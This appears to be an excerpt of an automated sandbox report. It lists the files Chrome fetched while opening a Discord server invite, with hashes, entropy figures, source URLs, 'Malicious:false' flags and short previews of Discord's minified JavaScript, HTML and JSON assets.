                                                                                                                                                                                                                                                                                    SHA-256:440AD8B1449985479BC37265E9912BBF2BF56FE9FFD14709358A8E9C2D5F8E5B
                                                                                                                                                                                                                                                                                    SHA-512:AAEA9683EB6C4A24107FC0576EB68E9002ADB0C58D3B2C88B3F78D833EB24CECDD9FF5C20DABE7438506A44913870A1254416E2C86EC9ACBBCC545BF40EA6D48
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/ecff74bf4394e6e58dd1.woff2
                                                                                                                                                                                                                                                                                    Preview:wOF2..............|`.......B..........................Z.. .`..P..B..W.....,..U.6.$..`..r.. ..n..F..5[.V...n.<..j.......n....G...T...asj...nV..W........L6.0...U+.....5.M3gx..j.Ic.&..- ...<"....r..N(B..0..2`..(TI0|.N..n`..W..b....|.gX....={...S\*..C...J...._.*RY..dR...\.>.Z...yG.F.9.i...vn..!F.U....1.-u.....Z.S...k....0|..2.$D..<L..E.....H.p.....]..Lu.......t.2..Mq.B.+..r}.....&XBU/...T."..?U'T.2....|J]...!....C2e.\I..PQ-+s..*...5..G.?b.,`. )....s..A........)..z.".U.=....".M..m...c...HQs..Q...]..bE...8..d8.C233..p..l.&"C../%2R......s.$..@....1....J]U.....w..G0.....l..X......L.......z...)rD../...r.LC.T.$A. .. A.Y!.6...It....jG.t..*w./...y.X..;......~_..[...^9'.B...#..Ol.....f....F.b....g?...x.-.....i.-Kx...U.k.JG..6.q:..1.a....?....f......m.....K3...4=UK....t...o..s.Dm.9.n./.._K..JSM...T...3.H........6"3...w..>.Kb.g..............F@..E.R.+%<G..U.|6.....(S..MRt...zy.O..#P..........X.t.uj...s....#z..F...X..U.5.cT).Q...Y....pa.z.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):109613
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4029332021931715
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:fCBKa1oPP8sGolumyOSsN5VYpLUBDL2QPidmHTRWisxpLAkF+d10J:qB9C81a5YpL5kl9sxpTa10J
                                                                                                                                                                                                                                                                                    MD5:80F500D4D0495E5C74E9B92CBC26F088
                                                                                                                                                                                                                                                                                    SHA1:A2C3F68D87AD8F793935FA7B8D05A0A2D635C4E0
                                                                                                                                                                                                                                                                                    SHA-256:407002AD3FD8CF26EF02A802DD0D4DB7BFF395D8C22F5F8580CA6CE65A797238
                                                                                                                                                                                                                                                                                    SHA-512:500C40BF257E7F4098B3B64CEDD49D8612FAF8B254CF496019C5B579C784A416F466C6BAC174B5317A663071E736C2DF82D22E6A7F88AF664BC421A974ABDF59
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/55ad931ed92a15c15709.js
                                                                                                                                                                                                                                                                                    Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["63288"],{473452:function(e,t){"use strict";t.Z=function(e){for(var t,n=e.length,o=n^n,r=0;n>=4;)t=(65535&(t=255&e.charCodeAt(r)|(255&e.charCodeAt(++r))<<8|(255&e.charCodeAt(++r))<<16|(255&e.charCodeAt(++r))<<24))*1540483477+(((t>>>16)*1540483477&65535)<<16),t^=t>>>24,o=(65535&o)*1540483477+(((o>>>16)*1540483477&65535)<<16)^(t=(65535&t)*1540483477+(((t>>>16)*1540483477&65535)<<16)),n-=4,++r;switch(n){case 3:o^=(255&e.charCodeAt(r+2))<<16;case 2:o^=(255&e.charCodeAt(r+1))<<8;case 1:o^=255&e.charCodeAt(r),o=(65535&o)*1540483477+(((o>>>16)*1540483477&65535)<<16)}return o^=o>>>13,o=(65535&o)*1540483477+(((o>>>16)*1540483477&65535)<<16),((o^=o>>>15)>>>0).toString(36)}},230371:function(e,t){"use strict";t.Z=function(e){var t={};return function(n){return void 0===t[n]&&(t[n]=e(n)),t[n]}}},184826:function(e,t){"use strict";t.Z=function(e){function t(e,t,o){var r=t.trim().split(h);t=r;var i=r.length,a=e.length;switch(a){case
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17640)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):17689
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.434053150388305
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:V5Vr/jve2WzOjBYUqxqYJVqA9sUqY1Un0VGiZhWuJj4SNZ:vVLxjE0VqR
                                                                                                                                                                                                                                                                                    MD5:14E84006F1AA9308539C8042DE09B598
                                                                                                                                                                                                                                                                                    SHA1:AE9D5A748D6C89CA35C9070D7D28A57E21911C35
                                                                                                                                                                                                                                                                                    SHA-256:EB0A78267C1E3AD8D0AE58A3BF20BAE35F911AD5000B5F103313E9F2F86D3112
                                                                                                                                                                                                                                                                                    SHA-512:89773668D42BE6F04627E8FA3B596FBAC10DBD71F048CAEC9F8EFD4E693A46A1EF29137A122B764691E32AB6EC4638EC0879DD971FB0DAA9FFD365BD27FF2DDA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["11260"],{26230:function(e){e.exports="/assets/afd44ae05126b5fab40d.svg"},935227:function(e){e.exports="/assets/50b96601171fd361101c.svg"},479495:function(e,t,n){n(757143);var s,r=n(200651),i=n(192379),o=n(120356),l=n.n(o),a=n(593473),c=n(873546),u=n(442837),d=n(570140),h=n(893776),p=n(129293),m=n(388905),f=n(17894),g=n(124860),x=n(108427),C=n(314897),v=n(585483),N=n(981631),j=n(388032),y=n(113207);function E(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}u.ZP.initialize();class k extends(s=i.PureComponent){componentDidMount(){(0,x.e)("reset_password")}renderPasswordReset(){let{password:e,error:t,hasCancel:s}=this.state,i=this.isSubmitting(),o=null!=t?t:this.renderError("password");return(0,r.jsxs)(m.ZP,{onSubmit:this.handleSubmit,tag:"form",children:[(0,r.jsx)("img",{alt:"",src:null==o?n(26230):n(935227),className:y.marginBottom20}),(0,r.jsx
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (1232)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):10857
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.413636811077494
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:nwow3wTtJnaAkEYOfRrcLn6WLqRe5mvtgCsXe5oEYGKnx/IJ:wnATbamRrcT1JoVNonx/0
                                                                                                                                                                                                                                                                                    MD5:DED416C9BCF8BC49DA3B46F28C143929
                                                                                                                                                                                                                                                                                    SHA1:A623684FFE2121A8CAB340A2B827D4BD3B9D605E
                                                                                                                                                                                                                                                                                    SHA-256:54384B1293B0BCFCF4BDA00BFD567B484FB086CB504D0FED281359D961846357
                                                                                                                                                                                                                                                                                    SHA-512:DCCD6DB8AFED059A3AB2FE0470575B862E0E0380736A7BB9FA66F89ED0D865CD39E30275B9F5AAC056861C264064E280307F7EC175E0E53FCF921BE0A5C43658
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>.<head> <meta charset="utf-8">. <meta content="width=device-width,initial-scale=1,maximum-scale=3" name="viewport">.<meta name="description" content="Check out the NO NAME community on Discord - hang out with 1808 other members and enjoy free voice and text chat." />.<meta name="twitter:card" content="summary_large_image" />.<meta name="twitter:site" content="@discord" />.<meta name="twitter:title" content="Join the NO NAME Discord Server!" />.<meta name="twitter:description" content="Check out the NO NAME community on Discord - hang out with 1808 other members and enjoy free voice and text chat." />.<meta property="og:title" content="Join the NO NAME Discord Server!" />.<meta property="og:url" content="https://discord.com/invite/BNXa5rYFXM" />.<meta property="og:description" content="Check out the NO NAME community on Discord - hang out with 1808 other members and enjoy free voice and text chat." />.<meta property="og:site_name" content="Discord" />.<link r
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17618)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):17667
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.611343731278581
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:eJUI8Nyx38PwalEbNhCSiYDiSqTNhAF0n:wUIE2384alhYlqNw0n
                                                                                                                                                                                                                                                                                    MD5:27DED6C70D643B2405057D268B1544BE
                                                                                                                                                                                                                                                                                    SHA1:9A0643786715F4F99E49D3715817834954A26300
                                                                                                                                                                                                                                                                                    SHA-256:4C4B922F219A8C4CA7D84F7712C8DC310EE45928E1716579372F95C9ED76C61D
                                                                                                                                                                                                                                                                                    SHA-512:922C28AAEAC286B452F989E2D2B9EE9260BA94062EE365DB6B61944BFF610CECF4CD277092E67F578865307521377B070E3EEE651F0049262A3D28F1D87EABCC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/d4dcfe8e106a8072717f.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["25788"],{533307:function(e,t,n){let r;var i=n(544891),s=n(570140),l=n(728345),o=n(812206),a=n(625128),c=n(335131),d=n(669079),u=n(981631),_=n(474936);async function E(e){let t=arguments.length>1&&void 0!==arguments[1]&&arguments[1],n=arguments.length>2&&void 0!==arguments[2]&&arguments[2];s.Z.dispatch({type:"GIFT_CODE_RESOLVE",code:e});try{let r=await (0,d.bT)(e,t,n);if(null!=r.application_id&&r.application_id!==_.CL){let e=o.Z.getApplication(r.application_id);if(null==e)try{await l.ZP.fetchApplication(r.application_id)}catch(e){}}if(r.application_id===u.XAJ)try{await (0,c.jr)(r.sku_id)}catch(e){}return s.Z.dispatch({type:"GIFT_CODE_RESOLVE_SUCCESS",giftCode:r}),{giftCode:r}}catch(t){throw s.Z.dispatch({type:"GIFT_CODE_RESOLVE_FAILURE",code:e,error:t}),t}}r=n(775644).Z,t.Z={resolveGiftCode:E,async fetchUserGiftCodesForSKU(e){let t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null;s.Z.dispatch
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8042), with no line terminators
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):8042
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.757506095873381
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:hn6wHkBQPIHzZ+PhHBEQyMex7puJkwcQP2yKoAh9SmpZnzWMgk:Z9PIHzwPhhEQyMiwc22y20mpZn5P
                                                                                                                                                                                                                                                                                    MD5:5317E6A04AFB28E40FFEE1B1AFD78947
                                                                                                                                                                                                                                                                                    SHA1:90B20D947FDDE0C0CF3DF27F4DD462DD875E1A7C
                                                                                                                                                                                                                                                                                    SHA-256:72D8EF7E3717C03E1E5440E37174420702632865A666057B7C11FB308BCB4863
                                                                                                                                                                                                                                                                                    SHA-512:5A47249DD5830233A4E6BC20B00D7209A22C6B845E7C92CFC204C0E18712B90F0B63E4A26C07DCB05537EDB6DCAF1BF4262C28825B14896C1C9573B36446B1D2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/e4025c85ea63/main.js?
                                                                                                                                                                                                                                                                                    Preview:window._cf_chl_opt={cFPWv:'g'};~function(V,h,i,n,o,s,z,A){V=b,function(c,d,U,e,f){for(U=b,e=c();!![];)try{if(f=-parseInt(U(304))/1+parseInt(U(328))/2+parseInt(U(327))/3+-parseInt(U(319))/4+parseInt(U(322))/5*(-parseInt(U(251))/6)+parseInt(U(326))/7*(-parseInt(U(229))/8)+parseInt(U(233))/9,d===f)break;else e.push(e.shift())}catch(D){e.push(e.shift())}}(a,888765),h=this||self,i=h[V(224)],n=function(a0,d,e,f){return a0=V,d=String[a0(265)],e={'h':function(D){return D==null?'':e.g(D,6,function(E,a1){return a1=b,a1(300)[a1(287)](E)})},'g':function(D,E,F,a2,G,H,I,J,K,L,M,N,O,P,Q,R,S,T){if(a2=a0,null==D)return'';for(H={},I={},J='',K=2,L=3,M=2,N=[],O=0,P=0,Q=0;Q<D[a2(261)];Q+=1)if(R=D[a2(287)](Q),Object[a2(273)][a2(231)][a2(281)](H,R)||(H[R]=L++,I[R]=!0),S=J+R,Object[a2(273)][a2(231)][a2(281)](H,S))J=S;else{if(Object[a2(273)][a2(231)][a2(281)](I,J)){if(256>J[a2(241)](0)){for(G=0;G<M;O<<=1,P==E-1?(P=0,N[a2(266)](F(O)),O=0):P++,G++);for(T=J[a2(241)](0),G=0;8>G;O=O<<1.99|T&1.33,E-1==P?(P=0,N[a2(26
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8522)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):8571
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.511405916704806
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:3RoCBoVnemKEVZxodmEPwwPoclkXrG8FiU:3bqYsZxomwPNlSq8oU
                                                                                                                                                                                                                                                                                    MD5:6340DBB0189AB130A0A6AE039C03F351
                                                                                                                                                                                                                                                                                    SHA1:E8F1AB7241B7341A4309E8959F95FFC04FDB212E
                                                                                                                                                                                                                                                                                    SHA-256:71E1BE4A03EC3BE786431A11B3E80C5F5D5DD2873ADA235C5154EE9DA0304088
                                                                                                                                                                                                                                                                                    SHA-512:3C7F47477D603AACD173B54F69EA908930049BB3D56DE70089B02085FE6C6F51CB84751750D48E1C3CB1A0D7DDED48C98DC2715B1C9F64FCE33FD57C6131E698
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/8e217faefc0006e5a018.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["18543"],{725436:function(t,e,n){n.d(e,{m:function(){return u}});var l=n(454585),r=n(551452),i=n(532901);let a={...l.Z.guildEventRules.link,react:(0,i.Z)({enableBuildOverrides:!1,mustConfirmExternalLink:!0}).react},s={...l.Z.guildEventRules.channelMention,react:(0,r.Z)({enableBuildOverrides:!1,shouldCloseDefaultModals:!0,shouldStopPropagation:!0}).react},u=l.Z.reactParserFor({...l.Z.guildEventRules,link:a,channelMention:s})},315416:function(t,e,n){n.d(e,{Z:function(){return s}});var l=n(192379),r=n(442837),i=n(897285),a=n(924301);function s(t,e,n){let s=(0,r.e7)([a.ZP],()=>a.ZP.getUserCount(e,n));return(0,l.useEffect)(()=>{null!=t&&null!=e&&i.Z.getGuildEventUserCounts(t,e,null!=n?[n]:[])},[e,t,n]),s}},405613:function(t,e,n){n.d(e,{Z:function(){return i}});var l=n(134432),r=n(981631);function i(t,e){let n;if(null==t.image)return null;null==e&&(e=window.screen.width*(0,l.x_)()),e=(0,l.oO)(e);let i=window.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):973
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.083490666926755
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:Y7KFtAfSBjYVkzoEKfbyN6Kwi03t1/BqUorFv:Y7kCfS9YVEEbuwH3r/EZ
                                                                                                                                                                                                                                                                                    MD5:9F3AF909D4870F7075AF0B630E5BE23C
                                                                                                                                                                                                                                                                                    SHA1:14E91902DADDA2870B5566A5E2ACF65AB662B385
                                                                                                                                                                                                                                                                                    SHA-256:0391062D1665B23A60C3CC27E3CFE1EC69A1AB01C56D745A02F949FCA2066A36
                                                                                                                                                                                                                                                                                    SHA-512:27F8CA5968C097EE8CA9009080BC0AE45F1B012416955B2C73B69F1A798CC47071B65692A464208D8EEAE215DB43CBDD9913A1A54A7FAE590B410A60B3EC5036
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/api/v9/invites/BNXa5rYFXM?with_counts=true&with_expiration=true
                                                                                                                                                                                                                                                                                    Preview:{"type":0,"code":"BNXa5rYFXM","inviter":{"id":"984391008039096330","username":"9wda","avatar":"bb19c91a787f443a5fbe82a173daa4f3","discriminator":"0","public_flags":256,"flags":256,"banner":null,"accent_color":null,"global_name":"no name","avatar_decoration_data":null,"banner_color":null,"clan":null,"primary_guild":null},"expires_at":null,"flags":2,"guild":{"id":"1250434927087058944","name":"NO NAME","splash":null,"banner":null,"description":null,"icon":"06f5aa2f0dfc1da41888860135dc216c","features":["AUTO_MODERATION","SOUNDBOARD"],"verification_level":0,"vanity_url_code":null,"nsfw_level":0,"nsfw":false,"premium_subscription_count":1},"guild_id":"1250434927087058944","channel":{"id":"1260598578452369499","type":0,"name":"\ud83d\udce2\u1cbc\u2022\u1cbc\ud835\uddd4\ud835\udde1\ud835\udde1\ud835\udde2\ud835\udde8\ud835\udde1\ud835\uddd6\ud835\uddd8\ud835\udde0\ud835\uddd8\ud835\udde1\ud835\udde7"},"approximate_member_count":1808,"approximate_presence_count":191}.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):238
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.447904228954295
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:SM4krZurFHDZqBE8gh0S/nLLLQ/7CpTYws0VV:/4kUFHAy1J/njQGdX
                                                                                                                                                                                                                                                                                    MD5:5822280717DD3CCEEFE1400D876D4A4A
                                                                                                                                                                                                                                                                                    SHA1:0695EFDFD8D521F7F412F1B6931B709E2B37CE94
                                                                                                                                                                                                                                                                                    SHA-256:F694637EE760D283B23B2A4F7DE289E52A2C6807FDE9F2CA3E9109D4E1EF2CC4
                                                                                                                                                                                                                                                                                    SHA-512:0ABFFACAB998C4E50C2626B033FE78398B6F19259F388E40317FB3FAD44AC004CF2918A6452C528BCA8FE302D26FF33C480492151909D1B3B1801E09C3ED8CB6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/09a6f112fcbc17f6cfd4.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["4071"],{126436:function(p,s,a){a.r(s),s.default=JSON.parse('{"cgdAs7":"(Will open in a new tab)"}')}}]);.//# sourceMappingURL=09a6f112fcbc17f6cfd4.js.map
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):168252
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.532388540124325
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:kCRnpfBEBt6+wHVGWdJsMnh1fxwsp7SvXcvWy:HpfBEBzw1GWdJsmfxwsp7SvXkj
                                                                                                                                                                                                                                                                                    MD5:2088CF886851CB41B694B6059102A249
                                                                                                                                                                                                                                                                                    SHA1:75364359AC3E1578F61AE76B9BB23AF8FCB81EA4
                                                                                                                                                                                                                                                                                    SHA-256:E4B63670BDF69AC30225550D06916286B3F1CADBC11838C568D3B6690BDE9BFA
                                                                                                                                                                                                                                                                                    SHA-512:839087BB56F6F771324822CDD3C0CB7D66D9755A863C01415DCFE79585D98A59B53DD5D3EEEB81D8D92AFCECCCF9D4CE11925B1222DF63DA103AD31BB9F2013D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/52015caea7357a7a60a9.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["51838"],{863942:function(e,t,n){var i=n(22092);(0,n(192291).exportTypedArrayStaticMethod)("from",n(12367),i)},70519:function(e){e.exports="/assets/76a4af59aa173c519461.svg"},806848:function(e){e.exports="/assets/6183fdc13d8046fd5bda.svg"},231443:function(e){e.exports="/assets/e04bcb7316f7205e85fb.svg"},512266:function(e){e.exports="/assets/a2d51a24d014f52f83a6.png"},105020:function(e){e.exports="/assets/89ea0e62d0f8ffa67a17.svg"},262467:function(e){e.exports="/assets/86755fd1deda5cb45518.svg"},640356:function(e){e.exports="/assets/3880dc73d6be9d91ef36.svg"},515695:function(e){e.exports="/assets/450a761db3bfe89ca9b9.png"},892235:function(e){e.exports="/assets/48f03d965f1e82275006.svg"},375673:function(e){e.exports="/assets/3cf7f333e815240d3294.svg"},73962:function(e){e.exports="/assets/ed7318a94c14ce41d11d.svg"},689411:function(e){e.exports="/assets/831c999494cb5e095eae.svg"},2984:function(e){e.exports=
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65452), with no line terminators
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):1116184
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.178482469121555
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6144:RQpC3YOy5K/YwhjjmysnhoxtDF+0CehY9yCt3gzzR/zU7gy/msacu9GLLSwiXNF8:2ZUCNKzR5Jti2CHV69rYuO1zJ72vjtY
                                                                                                                                                                                                                                                                                    MD5:6711DB79358E775C42B3D16399971300
                                                                                                                                                                                                                                                                                    SHA1:74AAC9F1BE2C10C3C2E0AB2B790D66D0DC4A9592
                                                                                                                                                                                                                                                                                    SHA-256:A24B1CDBA5CC136E189EF80D928914526C9E76DA614F11020398E2619A17620A
                                                                                                                                                                                                                                                                                    SHA-512:A2FCA03E4E1B0576CAE741C380AC2E4EFAA7AD6B5345E608DA444AF2845911A6F6DB9F4E2AA3212552EB18F9D6CD50F9A5DDCE48BA7A1A32E40BB3BC632D3D41
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/1098b8da25f51e58cea4.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["22721"],{756809:function(e,o,t){t.r(o),o.default=JSON.parse('{"7sFNfX":"Remove member","Q+uD09":"This person\'s highest role is the same as yours, so you cannot manage them.","0F/Zzc":"This server requires members with moderation powers to have Multi-Factor Authentication. You cannot take any moderation actions until you enable it.","9fmXWF":"You have a verified email.","8P7MX1":"Sorry :(","SxsBFB":"Can you tell us more?","If4iTU":[[6,"subscriberCount",{"=1":[[7]," Boost"],"other":[[7]," Boosts"]},0,"cardinal"]],"0h7bx8":"Enable Hardware Scaling","PeXhgI":"Save Image","IwHU3d":"User Reported","kcHxi4":"Operating System","CUBxDA":"It may take a few minutes for the DNS record to propagate.","9iFR6+":"Contact","gIVkjo":"Manage Boosts","jHfRvb":["You must verify the following account to get the role ",[8,"$b",[[1,"roleName"]]]],"HhUh7O":"Dark Green","TQY/RU":"Membership Rejected","7Tllub":"Now you can use
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):139
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.710597482771287
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:t6WH7W+lFAATcvdnmFFSDDmJS4RKb5KGMXf/FGc8qQAGrqLW:t6Abli/m03mc4sldMX9QAw
                                                                                                                                                                                                                                                                                    MD5:72A8B168AD2C7EEA7B2559B5690C7695
                                                                                                                                                                                                                                                                                    SHA1:85E4F43154EA713C832BA27128A33EB7B2A7CF7A
                                                                                                                                                                                                                                                                                    SHA-256:1F988D1AD4AB163D61A584254C07D75F3241EB6380BF48BF7D8F981E13C092CD
                                                                                                                                                                                                                                                                                    SHA-512:11BCB1A3623B97C9DD2F22D0389B3CA05AB4F99596DE5D07C50C1FC83F7532D8C20B58379C54C38F503D86D8C2CAF52AF3B35FFCCDC4750089ABAF86C1C5294E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/2597d11c1e039607373e.svg
                                                                                                                                                                                                                                                                                    Preview:<svg fill="none" height="8" viewBox="0 0 8 8" width="8" xmlns="http://www.w3.org/2000/svg"><circle cx="4" cy="4" r="4" fill="#fff"/></svg>.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (10980)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):11029
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.414014518072761
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:YiNLbBPG+pZWO8s4bWVJtne8/9wPlgaBIhfS1TqVaPuRic0pPdJITbtrgY6ZnQpV:Yau+pgOB4bWV7eY9wPl2HB0ifaTYcqYy
                                                                                                                                                                                                                                                                                    MD5:0D550EA88632FD7BBE604D65E78B2E79
                                                                                                                                                                                                                                                                                    SHA1:6FF27D7436164B6BDF5CFCBC27F9787C39A07E8F
                                                                                                                                                                                                                                                                                    SHA-256:07EFFC13ED9C6748926991DDBBB1F24FB0C5131CF2B1E5ABCA3ECC5EAD5F39A0
                                                                                                                                                                                                                                                                                    SHA-512:D84D6A285699666D4923C34EEBBA8879C15E94DA871CB323B0A4AB8F57CCC0042FE06E6E9412066DE910C3AA73490D20AF29DE1758CC56B363559BE0963AC34C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["52030"],{48550:function(e,t,n){n.d(t,{P:function(){return i}});var l=n(388032);let i={get webauthn(){return l.intl.string(l.t.gTH4Dg)},get totp(){return l.intl.string(l.t.nXKmyc)},get sms(){return l.intl.string(l.t.ZbVwZW)},get password(){return l.intl.string(l.t["8F6hKS"])},get backup(){return l.intl.string(l.t.vhSRKS)}}},124860:function(e,t,n){n.d(t,{Cd:function(){return f},YR:function(){return g}}),n(47120),n(411104);var l=n(200651),i=n(192379),r=n(481060),s=n(447097),o=n(873124),a=n(248902),d=n(160511),u=n(51693),c=n(973810),h=n(388032);function f(e){var t,n;let{mfaChallenge:h,mfaFinish:f,onEarlyClose:m,onClose:g,width:S=440}=e,[x,v]=i.useState(null!==(n=null===(t=h.methods[0])||void 0===t?void 0:t.type)&&void 0!==n?n:"select"),[p,j]=i.useState(x),C=async e=>{let{mfaType:t,data:n}=e;await f({mfaType:t,data:n,ticket:h.ticket}),null!=g&&g()},b={mfaChallenge:h,finish:C,setSlide:v,onClose:m};return(0,l
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (13632)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):13681
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.656242388719142
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:pecfK3zZvqS+45fyDFHG79aAiZzWCvqq2L1HGgBnyFx7LHC:pecfK3V842FHGwW11ytO
                                                                                                                                                                                                                                                                                    MD5:59BB723DECFA5A2C2B359ED4C541E33B
                                                                                                                                                                                                                                                                                    SHA1:9127367FF0D823BC65EF067A3C2A2F4D9A0CBE8D
                                                                                                                                                                                                                                                                                    SHA-256:62EDDC80B34DF3AEA527CBF7D2FC413250531927E9F81968902F3D6BB5D127E8
                                                                                                                                                                                                                                                                                    SHA-512:B1E5CF1E6F441BECC47DFAB8BFB8BA6A7378995F004FB85D8ED6ECEE1EAB59D1770D578148B9144E33BBF0BECFA7E1D2113390723762A7E559126B0702EA646A
